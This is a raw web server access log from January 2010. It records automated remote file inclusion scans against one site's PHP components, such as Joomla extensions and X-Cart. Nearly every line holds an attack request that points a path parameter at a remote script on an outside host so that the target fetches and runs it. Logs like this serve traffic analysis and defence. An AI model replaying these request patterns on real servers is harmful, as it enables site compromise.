211.62.35.55 - - [03/Jan/2010:20:33:21 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
117.74.98.18 - - [03/Jan/2010:20:34:09 -0800] "GET /components/com_simpleboard/file_upload.php?sbp=http://www.surgicalline.com.br/images/x1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
117.74.98.18 - - [03/Jan/2010:20:34:09 -0800] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://www.surgicalline.com.br/images/x1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
117.74.98.18 - - [03/Jan/2010:20:34:10 -0800] "GET /logs/access_090803.log%20%20//components/com_simpleboard/file_upload.php?sbp=http://www.surgicalline.com.br/images/x1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [03/Jan/2010:20:34:39 -0800] "GET /logs/index.php?body=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [03/Jan/2010:20:34:39 -0800] "GET /index.php?body=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [03/Jan/2010:20:34:39 -0800] "GET /logs/access_090914.log/index.php?body=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [03/Jan/2010:20:34:58 -0800] "GET /logs/access_090914.log%20%20/index.php?body=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [03/Jan/2010:20:35:14 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [03/Jan/2010:20:35:14 -0800] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [03/Jan/2010:20:35:14 -0800] "GET /logs/access_091221.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.18.20.210 - - [03/Jan/2010:20:37:13 -0800] "GET /logs/access_091116.log//includes/class_item.php?fileExtension=http://www.colpos.mx/koplok/yes.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
216.18.20.210 - - [03/Jan/2010:20:37:13 -0800] "GET /logs//includes/class_item.php?fileExtension=http://www.colpos.mx/koplok/yes.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
216.18.20.210 - - [03/Jan/2010:20:37:14 -0800] "GET /includes/class_item.php?fileExtension=http://www.colpos.mx/koplok/yes.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
61.47.7.71 - - [03/Jan/2010:20:37:24 -0800] "GET /logs/access_090914.log%20%20/index.php?body=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [03/Jan/2010:20:37:34 -0800] "GET /logs/access_091026.log%20%20/index.php?body=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.70.116.3 - - [03/Jan/2010:20:37:59 -0800] "GET /logs//includes/class_item.php?fileExtension=http://www.colpos.mx/koplok/yes.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
216.70.116.3 - - [03/Jan/2010:20:37:59 -0800] "GET /includes/class_item.php?fileExtension=http://www.colpos.mx/koplok/yes.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
216.70.116.3 - - [03/Jan/2010:20:37:59 -0800] "GET /logs/access_091116.log//includes/class_item.php?fileExtension=http://www.colpos.mx/koplok/yes.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
212.175.5.130 - - [03/Jan/2010:20:38:41 -0800] "GET /logs/access_091116.log//includes/class_item.php?fileExtension=http://www.colpos.mx/koplok/yes.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
212.175.5.130 - - [03/Jan/2010:20:38:41 -0800] "GET /includes/class_item.php?fileExtension=http://www.colpos.mx/koplok/yes.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
212.175.5.130 - - [03/Jan/2010:20:38:41 -0800] "GET /logs//includes/class_item.php?fileExtension=http://www.colpos.mx/koplok/yes.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
91.142.208.150 - - [03/Jan/2010:20:38:53 -0800] "GET /logs//includes/class_item.php?fileExtension=http://www.colpos.mx/koplok/yes.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
91.142.208.150 - - [03/Jan/2010:20:38:53 -0800] "GET /includes/class_item.php?fileExtension=http://www.colpos.mx/koplok/yes.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
212.175.5.130 - - [03/Jan/2010:20:38:53 -0800] "GET /logs/access_091116.log//includes/class_item.php?fileExtension=http://www.colpos.mx/koplok/yes.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
212.175.5.130 - - [03/Jan/2010:20:38:53 -0800] "GET /includes/class_item.php?fileExtension=http://www.colpos.mx/koplok/yes.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
91.142.208.150 - - [03/Jan/2010:20:38:53 -0800] "GET /logs/access_091116.log//includes/class_item.php?fileExtension=http://www.colpos.mx/koplok/yes.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
212.175.5.130 - - [03/Jan/2010:20:38:54 -0800] "GET /logs//includes/class_item.php?fileExtension=http://www.colpos.mx/koplok/yes.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
64.151.247.1 - - [03/Jan/2010:20:39:01 -0800] "GET /logs/access_090622.log/phphtml.php?htmlclass_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.151.247.1 - - [03/Jan/2010:20:39:15 -0800] "GET /logs/access_090629.log/phphtml.php?htmlclass_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [03/Jan/2010:20:39:36 -0800] "GET /logs/access_091026.log%20%20/index.php?body=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [03/Jan/2010:20:41:27 -0800] "GET /logs/access_090810.log//admin/auth.php?xcart_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [03/Jan/2010:20:41:27 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [03/Jan/2010:20:41:27 -0800] "GET /admin/auth.php?xcart_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [03/Jan/2010:20:41:27 -0800] "GET /logs/access_091214.log//admin/auth.php?xcart_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [03/Jan/2010:20:41:31 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [03/Jan/2010:20:41:31 -0800] "GET /admin/auth.php?xcart_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [03/Jan/2010:20:41:31 -0800] "GET /logs/access_091214.log%20%20//admin/auth.php?xcart_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [03/Jan/2010:20:41:33 -0800] "GET /admin/auth.php?xcart_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [03/Jan/2010:20:41:33 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [03/Jan/2010:20:41:33 -0800] "GET /logs/access_090810.log//admin/auth.php?xcart_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [03/Jan/2010:20:41:33 -0800] "GET /logs/access_091214.log//admin/auth.php?xcart_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [03/Jan/2010:20:41:34 -0800] "GET /admin/auth.php?xcart_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [03/Jan/2010:20:41:34 -0800] "GET /logs/access_091214.log//admin/auth.php?xcart_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [03/Jan/2010:20:41:34 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [03/Jan/2010:20:41:34 -0800] "GET /logs/access_090810.log//admin/auth.php?xcart_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [03/Jan/2010:20:41:34 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [03/Jan/2010:20:41:34 -0800] "GET /logs/access_091214.log%20%20//admin/auth.php?xcart_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [03/Jan/2010:20:41:34 -0800] "GET /admin/auth.php?xcart_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [03/Jan/2010:20:41:43 -0800] "GET /logs/access_091116.log%20%20//admin/auth.php?xcart_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [03/Jan/2010:20:41:44 -0800] "GET /logs/access_091116.log%20%20//admin/auth.php?xcart_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [03/Jan/2010:20:42:04 -0800] "GET /logs/access_090803.log//admin/auth.php?xcart_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [03/Jan/2010:20:42:04 -0800] "GET /admin/auth.php?xcart_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [03/Jan/2010:20:42:04 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [03/Jan/2010:20:42:07 -0800] "GET /admin/auth.php?xcart_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [03/Jan/2010:20:42:07 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [03/Jan/2010:20:42:07 -0800] "GET /logs/access_091214.log//admin/auth.php?xcart_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [03/Jan/2010:20:42:07 -0800] "GET /logs/access_090810.log//admin/auth.php?xcart_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [03/Jan/2010:20:42:10 -0800] "GET /admin/auth.php?xcart_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [03/Jan/2010:20:42:10 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [03/Jan/2010:20:42:10 -0800] "GET /logs/access_090803.log//admin/auth.php?xcart_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.151.247.1 - - [03/Jan/2010:20:42:30 -0800] "GET /logs/kete%20?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.151.247.1 - - [03/Jan/2010:20:42:30 -0800] "GET /logs/access_090921.log/kete%20?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.151.247.1 - - [03/Jan/2010:20:42:30 -0800] "GET /logs/access_090615.log/kete%20?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.151.247.1 - - [03/Jan/2010:20:42:30 -0800] "GET /kete%20?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.151.247.1 - - [03/Jan/2010:20:43:54 -0800] "GET /logs/access_090615.log/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.151.247.1 - - [03/Jan/2010:20:43:54 -0800] "GET /logs/access_090921.log/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.151.247.1 - - [03/Jan/2010:20:43:54 -0800] "GET /logs/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
64.151.247.1 - - [03/Jan/2010:20:43:54 -0800] "GET /?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [03/Jan/2010:20:44:33 -0800] "GET /logs/access_091228.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.chicagofc.co.kr/fitness/data/come11/fx29id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [03/Jan/2010:20:44:33 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.chicagofc.co.kr/fitness/data/come11/fx29id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [03/Jan/2010:20:44:33 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.chicagofc.co.kr/fitness/data/come11/fx29id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.151.247.1 - - [03/Jan/2010:20:44:34 -0800] "GET /logs/access_090907.log/kete%20?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [03/Jan/2010:20:45:38 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.chicagofc.co.kr/fitness/data/come11/fx29id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.19.116.18 - - [03/Jan/2010:20:45:38 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.chicagofc.co.kr/fitness/data/come11/fx29id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.19.116.18 - - [03/Jan/2010:20:45:38 -0800] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.chicagofc.co.kr/fitness/data/come11/fx29id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.151.247.1 - - [03/Jan/2010:20:45:49 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.151.247.1 - - [03/Jan/2010:20:45:49 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.151.247.1 - - [03/Jan/2010:20:45:50 -0800] "GET /logs/access_090921.log%20%20/kete%20?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.32.182 - - [03/Jan/2010:20:45:53 -0800] "GET /logs/access_090914.log%20%20/index.php?body=http://www.eduhy.or.kr/~gifted/bbs/list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.32.182 - - [03/Jan/2010:20:45:53 -0800] "GET /index.php?body=http://www.eduhy.or.kr/~gifted/bbs/list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.32.182 - - [03/Jan/2010:20:45:54 -0800] "GET /logs/index.php?body=http://www.eduhy.or.kr/~gifted/bbs/list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.32.182 - - [03/Jan/2010:20:46:11 -0800] "GET /logs/access_090914.log%20%20/index.php?body=http://www.eduhy.or.kr/~gifted/bbs/list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.32.182 - - [03/Jan/2010:20:46:11 -0800] "GET /logs/index.php?body=http://www.eduhy.or.kr/~gifted/bbs/list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.32.182 - - [03/Jan/2010:20:46:11 -0800] "GET /index.php?body=http://www.eduhy.or.kr/~gifted/bbs/list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.151.247.1 - - [03/Jan/2010:20:46:19 -0800] "GET /logs/access_090907.log%20%20/kete%20?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.32.182 - - [03/Jan/2010:20:46:32 -0800] "GET /index.php?body=http://www.eduhy.or.kr/~gifted/bbs/list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.32.182 - - [03/Jan/2010:20:46:32 -0800] "GET /logs/access_090914.log%20%20/index.php?body=http://www.eduhy.or.kr/~gifted/bbs/list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.32.182 - - [03/Jan/2010:20:46:32 -0800] "GET /logs/index.php?body=http://www.eduhy.or.kr/~gifted/bbs/list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.151.247.1 - - [03/Jan/2010:20:47:15 -0800] "GET /common/db.php?commonpath=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
64.151.247.1 - - [03/Jan/2010:20:47:15 -0800] "GET /logs/access_090615.log%20//common/db.php?commonpath=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
64.151.247.1 - - [03/Jan/2010:20:47:15 -0800] "GET /logs//common/db.php?commonpath=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
66.249.65.113 - - [03/Jan/2010:20:47:38 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
64.151.247.1 - - [03/Jan/2010:20:48:43 -0800] "GET /logs/access_090615.log//common/db.php?commonpath=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
64.151.247.1 - - [03/Jan/2010:20:48:43 -0800] "GET /logs/access_090921.log//common/db.php?commonpath=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
211.255.32.182 - - [03/Jan/2010:20:48:44 -0800] "GET /logs/access_090914.log%20%20/index.php?body=http://www.eduhy.or.kr/~gifted/bbs/list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.32.182 - - [03/Jan/2010:20:48:44 -0800] "GET /logs/index.php?body=http://www.eduhy.or.kr/~gifted/bbs/list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.32.182 - - [03/Jan/2010:20:48:44 -0800] "GET /index.php?body=http://www.eduhy.or.kr/~gifted/bbs/list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.32.182 - - [03/Jan/2010:20:48:59 -0800] "GET /index.php?body=http://www.eduhy.or.kr/~gifted/bbs/list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.32.182 - - [03/Jan/2010:20:48:59 -0800] "GET /logs/access_090914.log%20%20/index.php?body=http://www.eduhy.or.kr/~gifted/bbs/list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.32.182 - - [03/Jan/2010:20:48:59 -0800] "GET /logs/index.php?body=http://www.eduhy.or.kr/~gifted/bbs/list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [03/Jan/2010:20:49:14 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [03/Jan/2010:20:49:14 -0800] "GET /logs/access_091207.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [03/Jan/2010:20:49:14 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [03/Jan/2010:20:49:21 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [03/Jan/2010:20:49:22 -0800] "GET /logs/access_091207.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [03/Jan/2010:20:49:22 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [03/Jan/2010:20:49:25 -0800] "GET /logs/access_091228.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.chicagofc.co.kr/fitness/data/come11/fx29id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.235.148 - - [03/Jan/2010:20:49:33 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
62.67.235.148 - - [03/Jan/2010:20:49:33 -0800] "GET /logs/access_090803.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
62.67.235.148 - - [03/Jan/2010:20:49:33 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
62.67.235.148 - - [03/Jan/2010:20:49:34 -0800] "GET /logs/access_090803.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
62.67.235.148 - - [03/Jan/2010:20:49:34 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
62.67.235.148 - - [03/Jan/2010:20:49:34 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
67.19.116.18 - - [03/Jan/2010:20:50:55 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.chicagofc.co.kr/fitness/data/come11/fx29id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.151.247.1 - - [03/Jan/2010:20:53:22 -0800] "GET /logs/access_090907.log/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [03/Jan/2010:20:53:37 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [03/Jan/2010:20:54:11 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [03/Jan/2010:20:54:11 -0800] "GET /logs/access_090810.log/convert/mvcw.php?step=1&vwar_root=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [03/Jan/2010:20:54:11 -0800] "GET /logs/access_090914.log/convert/mvcw.php?step=1&vwar_root=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.90.98.94 - - [03/Jan/2010:20:55:43 -0800] "GET /inc/header.php/step_one.php?server_inc=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.90.98.94 - - [03/Jan/2010:20:55:46 -0800] "GET /logs//inc/header.php/step_one.php?server_inc=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
